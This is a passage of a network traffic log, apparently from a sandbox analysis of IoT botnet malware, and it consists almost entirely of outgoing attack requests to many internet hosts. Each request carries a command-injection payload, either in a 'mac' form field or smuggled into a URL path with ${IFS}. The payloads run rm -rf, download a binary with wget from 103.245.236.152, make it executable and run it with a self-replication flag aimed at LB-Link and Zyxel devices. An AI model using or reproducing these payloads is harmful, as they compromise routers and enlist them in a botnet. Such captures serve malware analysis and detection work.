                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:48.311314106 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6656192.168.2.2335204116.202.18.1318080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.904536963 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:48.094631910 CET175INHTTP/1.1 400 Bad Request: missing required Host header
                                            Content-Type: text/plain; charset=utf-8
                                            Connection: close
                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 48 6f 73 74 20 68 65 61 64 65 72
                                            Data Ascii: 400 Bad Request: missing required Host header


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6657192.168.2.234185894.120.54.1518080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.932543039 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6658192.168.2.23475249.136.131.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607327938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6659192.168.2.2336358178.17.167.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607352972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6660192.168.2.2337508153.130.165.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607367039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6661192.168.2.234870477.34.244.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607405901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6662192.168.2.2343342223.156.237.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607434988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6663192.168.2.235525877.245.66.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607440948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6664192.168.2.2351986139.125.1.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607472897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6665192.168.2.2341368103.49.246.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607506990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6666192.168.2.233583478.75.188.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607525110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6667192.168.2.2349292213.213.124.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607549906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6668192.168.2.235295668.195.255.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607589006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6669192.168.2.2335388108.85.66.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607613087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6670192.168.2.235222457.151.233.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607647896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6671192.168.2.2338042136.77.195.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607686996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6672192.168.2.235242661.244.228.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607708931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6673192.168.2.2354858168.103.85.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607745886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6674192.168.2.2349716159.4.162.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607773066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6675192.168.2.2335268195.230.230.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607779026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6676192.168.2.235601866.176.238.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607842922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6677192.168.2.234704452.136.59.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607894897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6678192.168.2.2339580176.50.118.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607918978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6679192.168.2.2345756150.164.81.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607934952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6680192.168.2.235130463.68.116.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.607980013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6681192.168.2.2359992197.223.12.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608017921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6682192.168.2.2336962142.3.24.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608046055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6683192.168.2.2352970113.3.188.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608082056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6684192.168.2.2358304155.59.119.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608108997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6685192.168.2.233501468.81.74.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608117104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6686192.168.2.2353514185.248.173.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608160019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6687192.168.2.2336364140.176.96.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608184099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6688192.168.2.23442585.176.36.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608238935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6689192.168.2.233639482.79.157.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608282089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6690192.168.2.2357092192.30.163.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608309984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6691192.168.2.2335114111.81.43.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608321905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6692192.168.2.2343680117.204.124.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608346939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6693192.168.2.2356076158.204.54.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608370066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6694192.168.2.233691418.174.130.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608408928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6695192.168.2.2334936181.48.155.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608422995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6696192.168.2.233422020.122.162.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608447075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6697192.168.2.2355168110.248.61.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608481884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6698192.168.2.236064250.174.234.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608491898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6699192.168.2.2351344197.199.106.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608529091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6700192.168.2.235146232.253.136.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608536959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6701192.168.2.233608875.163.111.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608588934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6702192.168.2.2342420157.108.241.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608625889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6703192.168.2.2357316113.189.131.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608654022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6704192.168.2.234486869.108.37.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608664036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6705192.168.2.2335736124.194.100.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608686924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6706192.168.2.235777081.59.48.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608707905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6707192.168.2.2335786192.145.144.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608751059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6708192.168.2.23418424.37.181.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608783960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6709192.168.2.23374709.158.173.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608814955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6710192.168.2.235930092.104.186.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.608839989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6711192.168.2.2358496152.76.38.115443
                                            TimestampBytes transferredDirectionData
